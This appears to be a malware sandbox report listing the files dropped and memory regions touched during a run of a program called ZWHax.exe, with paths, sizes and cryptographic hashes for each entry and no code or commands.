C:\Config.Msi\e58d6a7.rbsFilesize
823KB
MD5dd9ded44e9ee73bdd26033ff514f5918
SHA1b1058f8ad3b343b3a390110f441c6edd712d7f37
SHA256d6911a2a3c240a19013d3b5f5396ff2f4c847853bb707a634aeb58844553201d
SHA5125a8d623072cd4eb1f09c5c50533683589b651f4d35c9078748032e2937ec09f0f1f347e2dcb1e7c147b2ff800642773da98b34ab2a60c13ac055a3e8b16645e5
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSEFilesize
11KB
MD5dfc1b916d4555a69859202f8bd8ad40c
SHA1fc22b6ee39814d22e77fe6386c883a58ecac6465
SHA2567b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9
SHA5121fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.jsFilesize
79B
MD524563705cc4bb54fccd88e52bc96c711
SHA1871fa42907b821246de04785a532297500372fc7
SHA256ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13
SHA5122ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9
-
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSEFilesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\licenseFilesize
1KB
MD5b862aeb7e1d01452e0f07403591e5a55
SHA1b8765be74fea9525d978661759be8c11bab5e60e
SHA256fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f
SHA512885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f
-
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\licenseFilesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.mdFilesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSEFilesize
780B
MD5b020de8f88eacc104c21d6e6cacc636d
SHA120b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA2563f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA5124220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38
-
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSEFilesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSEFilesize
802B
MD5d7c8fab641cd22d2cd30d2999cc77040
SHA1d293601583b1454ad5415260e4378217d569538e
SHA25604400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.jsFilesize
16KB
MD5bc0c0eeede037aa152345ab1f9774e92
SHA156e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA2567a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA5125f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.jsonFilesize
1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA5125221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSEFilesize
763B
MD57428aa9f83c500c4a434f8848ee23851
SHA1166b3e1c1b7d7cb7b070108876492529f546219f
SHA2561fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.jsonFilesize
28B
MD556368b3e2b84dac2c9ed38b5c4329ec2
SHA1f67c4acef5973c256c47998b20b5165ab7629ed4
SHA25658b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd
SHA512d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.jsonFilesize
26B
MD52324363c71f28a5b7e946a38dc2d9293
SHA17eda542849fb3a4a7b4ba8a7745887adcade1673
SHA2561bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4
SHA5127437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.jsFilesize
17KB
MD5cf8f16c1aa805000c832f879529c070c
SHA154cc4d6c9b462ad2de246e28cd80ed030504353d
SHA25677f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573
SHA512a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.jsFilesize
15KB
MD59841536310d4e186a474dfa2acf558cd
SHA133fabbcc5e1adbe0528243eafd36e5d876aaecaa
SHA2565b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9
SHA512b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.urlFilesize
168B
MD51c1f6159630c170b596af7c9085f8bb0
SHA1ac26cfe43e10a9f76aee943f9ceff3dc77df29fd
SHA25661403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0
SHA512f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.urlFilesize
133B
MD535b86e177ab52108bd9fed7425a9e34a
SHA176a1f47a10e3ab829f676838147875d75022c70c
SHA256afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA5123c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZWHax.exe.logFilesize
226B
MD528d7fcc2b910da5e67ebb99451a5f598
SHA1a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA2562391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA5122d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54b4f91fa1b362ba5341ecb2836438dea
SHA19561f5aabed742404d455da735259a2c6781fa07
SHA256d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c
SHA512fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5eaa3db555ab5bc0cb364826204aad3f0
SHA1a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca
SHA256ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b
SHA512e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD575cc3205b80e14dfe92a759f7cd413ae
SHA1ccf1d29ae22e202f528acfaaf4125c9574923652
SHA2565d1e31403f4ee2d45c274e02e4d72b03e337dfd018f383d9aa408540c3662313
SHA512cb7a1145a897cc7eb2ab8c96030142ab083b5438205d0f575fb38ba10249e3f4b8b274b0516ffa7aab603a768e566356b265a69bc89ed1ca5e1650100c14773a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
579B
MD5e51401bdf1eae288a9ba5d952ebb3aa9
SHA15effd82fee8231e1294fd404dd1f10caf5c41fd2
SHA256a08ea4c022c5207583d92dedf27194f6d81335b90bef42e90132333220a52fa2
SHA512f777e86f2eb64d2c31afba76f544f9a65392b0d77de18e16d6a2b5534f43febc083f757d37c0719b29b556c5f73b1238c0857ee7b9a6e18c0c9c99ca54133edb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5f26adf19694ab72769beb9969486e075
SHA12282173b7d1d507edda34be71fcfad3b333db348
SHA256a1bf45cccfec5273d468459e34feace6532901933bafb33e81784a3f90344c9c
SHA51200b35096be1f7f90dc8ba465c2fe36a8fbb4418265f2a9e829effcd0cff9368841a9fd4c85b232a1c2636ba0c2207535728311d5a9488c7d05a28027d8bc3cde
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5be8566e95f612899c178f06f4ff485eb
SHA1c7c6151587cf17f424706064a7c3918de77da018
SHA2562deae6262795bc4f50e1d25f3eca5898b87a343082f7b5d3f6aa36b186e0865f
SHA5124b4b654725bcea966e6e65e6bb24b65acb1e406262f50485d1ecf8830db59c14503f716e9e18eb3996c4db10c9a505c78e7bd6cd07c9b732bdc799f026342be9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5717e4ed18e476ba914da2abc15f7aeda
SHA1ddda6026596fcee30ab483973289ff0ee7550bc9
SHA2567be6ba7e37e06ef38cba5db04143482f60a94aa56eb3fb8874f9cd393ace10e5
SHA5128a82fd5e78452146981792f1e007beb299a6dd6fd539a41f251f24d2c1ed12cd9e00ae959edd6085c6eaddc376b65affb18c1acfdd1a8c97e2ac30dcbb16f6be
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589e8d.TMPFilesize
1KB
MD5816d7aa01bf61f2ca01b5d053e8635a0
SHA14beb89821e70a8483523a174007546f90b2943fd
SHA25613bdfee53c5d45875d5d01d45cb09e5353b51234f925dd395b018b72151e3479
SHA512975179581c9b8506b7f2468e8a56adafea41e89b482d05b719205577ddbe3359e003e1db291a9dc1a8599617508e5f07e41159f397e5654c44e893895af5441d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5e6eb9ccd30ea98259353457a4833b0d1
SHA1cf72ae84e324853ba09ed360eae4cc48a8928cec
SHA256eab940d4a335bf3a63e564a3e6c68c5ab5e154d1be8e783f9b337d3aa89de575
SHA5125b72b6578b3392ca19a6415df9604a312edf58571377d7c1998a4b2f2065c99a081db5d642f511ff56a039441acc1404bcd5bb4e5ce3b918b9d8a6e866ba4a07
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD57eb7bcabb0580aa52320ef6098066537
SHA1695bd2238f90711e08e63ed5ff26d0ec637db124
SHA256aeb5f5502d0d4f265a326c44b69f9279e302fd7996d68847dcef7c45b45f34ce
SHA512aeca2b6054ee5a99a3f47cae53d7f19817b7f491c52117241c673050c4cb624c32e309b7c184dd5cc2e166a28f90c128b880ab74c685e5e143d4c2823917387d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD55cdd065b5aa721484b653ac9bfe94a68
SHA15e0c971aa85af3010930c38fa18db05612345983
SHA256bfd24e4c1764d39f03eedf9523f68f1d52699594d2b748bc6e6af8ae4e03d2f9
SHA5126e7cec8cefa8a5a994178940d0bccea9bdaabf00e49d27b021391f0a8c6672139af08b326d92e0aebfa78075997f4a6438913a8472335e1c3b18a3c106f9d8bd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5edff8411b90eb97d31dd00831bd9afb2
SHA129af749a3576d0c88c54e75c63ec59579dfe2b2d
SHA2569cce910fd370ca538c37d328df605fa870a09db90244ca17cde0cc75ac059edc
SHA512fa9bd63dcdb2934705f186edcf5db38009573e9e304ec2b21de47387c27acf51d84e4f61ebc98d22812d1b7df4c70a2354e4a623368b50d8c0f15aca25fb34e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f5fc6519219e8ab530a865e149a92a02
SHA1c87b95f3c358c6b12da350bb978ff195d2feb060
SHA2560420d40d4963dede50b4fb06bcd7ed341e9bae388c8cade178c52d0f4088d23f
SHA512dcd64a54d777f4832b959f91f4deea1106a6065dd7d0421d47e5de28a227033387bc9af695111b669aad7b2b36922ef09e5384628c708fe595e7daff7bb5468e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57627ddff8902f178593c52e473808648
SHA147ee5844b75a41d91a49270c60d521b29301b4b6
SHA256adcb516d315214c43b46a99b01325473b875ad80100ca8233c0e3851e29013af
SHA5126363b56f039abdd8d8dc5d3a073052f404077bdf96b73aee36f05663d788ce0227f88574e8a41404f6debfc5be7c90b30723259221f8de81672c4b83ec1f68f3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c20ac38ae3022e305b8752804aadf486
SHA14c144d6cfafb5c37ab4810ff3c1744df81493cdb
SHA25603cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
SHA512c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0
-
C:\Users\Admin\AppData\Local\Temp\215E.tmp\215F.tmp\2160.batFilesize
6KB
MD56f5b79636cacf3dcf01cd91bf06b299b
SHA15f693dc679f275b38741e992279ca67dee962857
SHA2562a2e2c1601d29375c31b86c53b9c50d1b59e07f1bf63435fb4f9529d0b5c9405
SHA51242f22a50ca011a92cbae8d0035915dcfde80f4fbc1c011619f2b4bc3166cddd30f8851634e1e28c9290b8550d6b8c865b3ddf6a4cad9b7cd5f9af5da8e78d600
-
C:\Users\Admin\AppData\Local\Temp\21FA.tmp\21FB.tmp\21FC.batFilesize
1KB
MD5271dec7719a77c4638942d8247d12033
SHA1e06d0309acc948f47bd1d2c4ced15a165875e4b6
SHA25633cd4ccab998f90c97b237fec669e31944906c70298187e506934877aa0605bd
SHA5123b352583360edbd980ac6885e0fdf431231fc39f8da0553b0457914fb1a2276bf508e3a33dc629857e5d47acb20fcddadee1120b99eaadb761443e6ae7b27226
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zepbszip.3ua.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\runHidden.vbsFilesize
164B
MD53dbc9561e526b850f960186a562d2716
SHA1dac89aeb2e534f9ecf01f8f4a06389158ccf72d1
SHA256a1f1409474f61cbbe7d590a54227120ad46573d45af64bfa87660cf9e76db2e0
SHA512c45abe0351fcf7c64990ff093fd642594f0ca4dd7328ed7d5b2b3433bb72a3c9cc79e4c295361acbb0ca59248527f3df712d2e8b4a56af43f661718042134d02
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx0.exeFilesize
94KB
MD5e0c72b8d8a04b2be1ab3f213d10e1dcd
SHA197ec44a40ba00a083b93a5f9636d4be35902e790
SHA2564609451d92ffef8ca086a59dc861f888ccf75917e3720209ad0b9912612e2998
SHA5124f2f54c36ffa0e65b7aa5b0399e8bf50b46f05d9652a19e83daab4a4b37865f514233175fe0ba86f0ba1ed824b41edb56394c70928507aafee5e071de51011a7
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx1.exeFilesize
423KB
MD58b1de71f412ebe150a2054bddc0ddcc8
SHA14782e5487b98bc353959dca110000328ba596c30
SHA256c1680857ca2993539b1cf3040f144cd26e324c0091ef7e4e500a390584c98b66
SHA512d725798c7677b54dc5fb1662ba98a71a50bdbcdf101b06cd560a90211be7ae9ebed315f2ceec8a38425c9de63ca53b4dc541b53d432deb17bafb1d102949c57b
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx2.exeFilesize
5.2MB
MD5d3a0a9f2a3e80ac0b21989c1d5122944
SHA1d329ff5a234047c101b5a17f6bc5fc8b796d0aa7
SHA256cbf66a9ab4d8749f32b89d73d0bc5ffd56edf8b59e608270bd5c3f08764babe0
SHA51240e651126f7d26442450e0069db1a55f9ad93df70c124ff6c900df61a762fd0e6b6c64e7196bd61b2c7d951996f8dd2e12c11f4151df8ccb03bbe21dbc30d2bf
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx3.exeFilesize
89KB
MD5232df1e89fad603c20a9dced57983322
SHA189347e16c723e4cc89a080066a632b9f48a26cb3
SHA2563b5ea4dddab91d998e105206b8cffade1554b065b88e584360710b11a315bfd0
SHA5121adc8603c0757daa7076fe2f6af7b88369841107c9cc964083e8e1fa90adff2b32f87278df48f53591161ce6507c9434a3426b6ec4532020d605495e1f9d2e5a
-
C:\Users\Admin\Downloads\ZWHAX.7zFilesize
2.1MB
MD58ea71e44bc940127bfd02d4512930c07
SHA1fab80238d2b10feba657db134bd37e4a521a0cd4
SHA2565aa80e1893ffd8c60fffb371e030851eec97991b6dab4b7854d358fe71d558c0
SHA512a7004171b424580c64e8b4f9663bb915c17f1d22bbe4289c2649a46b86350f8a298ed47b56fe8828dfd22b69ab6d000cec5b6ce4c0656d4818b14957ab1217e8
-
C:\Users\Admin\Downloads\ZWHAX\ZWHAX\ZWHax.exeFilesize
8KB
MD54fbb04c9e3aa983cbfc4980a7b5b7041
SHA134aeca658462e638521bc384a4935251678a9a78
SHA25624f095f4f5796561cc9f9c60f71a2182fee89692f239c92e7447af3461e12731
SHA512615534039ad97fea8c881656a53b6b0ead41e3770e0a3f3cd38052585dc5a102ab25b824c59c3142b75f6b62e56ff46ab981e27c889ded28a5cc2884581863bc
-
C:\Windows\Installer\MSI4234.tmpFilesize
390KB
MD580bebea11fbe87108b08762a1bbff2cd
SHA1a7ec111a792fd9a870841be430d130a545613782
SHA256facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1
SHA512a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6
-
C:\Windows\Installer\e58d6a8.msiFilesize
25.3MB
MD50df081aa47e7159e585488a161a97466
SHA12dc9a592dbb208624aff11a57f97bea89a315973
SHA25620c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d
SHA5122e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836
-
\??\pipe\LOCAL\crashpad_2724_BPLHSVMYDTXDFIWYMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/392-495-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/392-494-0x0000019D5BA70000-0x0000019D5BA9B000-memory.dmpFilesize
172KB
-
memory/400-509-0x0000016A23FA0000-0x0000016A23FCB000-memory.dmpFilesize
172KB
-
memory/400-510-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/416-501-0x000002447B710000-0x000002447B73B000-memory.dmpFilesize
172KB
-
memory/416-502-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/620-485-0x0000023606D70000-0x0000023606D9B000-memory.dmpFilesize
172KB
-
memory/620-486-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/620-484-0x0000023606D40000-0x0000023606D64000-memory.dmpFilesize
144KB
-
memory/672-490-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/672-489-0x000002DAE2A40000-0x000002DAE2A6B000-memory.dmpFilesize
172KB
-
memory/956-497-0x0000023A486D0000-0x0000023A486FB000-memory.dmpFilesize
172KB
-
memory/956-498-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/1048-513-0x00007FFA63710000-0x00007FFA63720000-memory.dmpFilesize
64KB
-
memory/1048-512-0x000001CD9FCA0000-0x000001CD9FCCB000-memory.dmpFilesize
172KB
-
memory/1100-515-0x0000022065860000-0x000002206588B000-memory.dmpFilesize
172KB
-
memory/1912-318-0x00007FFAA3690000-0x00007FFAA3885000-memory.dmpFilesize
2.0MB
-
memory/1912-317-0x0000000003540000-0x0000000003940000-memory.dmpFilesize
4.0MB
-
memory/1912-316-0x0000000003540000-0x0000000003940000-memory.dmpFilesize
4.0MB
-
memory/1912-263-0x0000000000760000-0x00000000007DE000-memory.dmpFilesize
504KB
-
memory/1912-320-0x00000000773C0000-0x00000000775D5000-memory.dmpFilesize
2.1MB
-
memory/1912-324-0x0000000000760000-0x00000000007DE000-memory.dmpFilesize
504KB
-
memory/3136-220-0x0000000000940000-0x0000000000948000-memory.dmpFilesize
32KB
-
memory/4328-227-0x0000022DC0050000-0x0000022DC0072000-memory.dmpFilesize
136KB
-
memory/5228-473-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5228-475-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5228-474-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5228-477-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5228-472-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5228-478-0x00007FFAA3690000-0x00007FFAA3885000-memory.dmpFilesize
2.0MB
-
memory/5228-481-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5228-479-0x00007FFAA3480000-0x00007FFAA353E000-memory.dmpFilesize
760KB
-
memory/5500-327-0x00000000773C0000-0x00000000775D5000-memory.dmpFilesize
2.1MB
-
memory/5500-321-0x0000000000F00000-0x0000000000F09000-memory.dmpFilesize
36KB
-
memory/5500-323-0x0000000002990000-0x0000000002D90000-memory.dmpFilesize
4.0MB
-
memory/5500-325-0x00007FFAA3690000-0x00007FFAA3885000-memory.dmpFilesize
2.0MB
-
memory/5680-425-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-423-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-421-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-422-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-415-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-417-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-416-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-424-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-427-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/5680-426-0x000002BEAC100000-0x000002BEAC101000-memory.dmpFilesize
4KB
-
memory/6084-383-0x0000000000D80000-0x0000000000DFE000-memory.dmpFilesize
504KB
-
memory/6084-413-0x00000000034E0000-0x00000000038E0000-memory.dmpFilesize
4.0MB
-
memory/6084-414-0x0000000000D80000-0x0000000000DFE000-memory.dmpFilesize
504KB
-
memory/6552-1170-0x0000015D4AE60000-0x0000015D4B606000-memory.dmpFilesize
7.6MB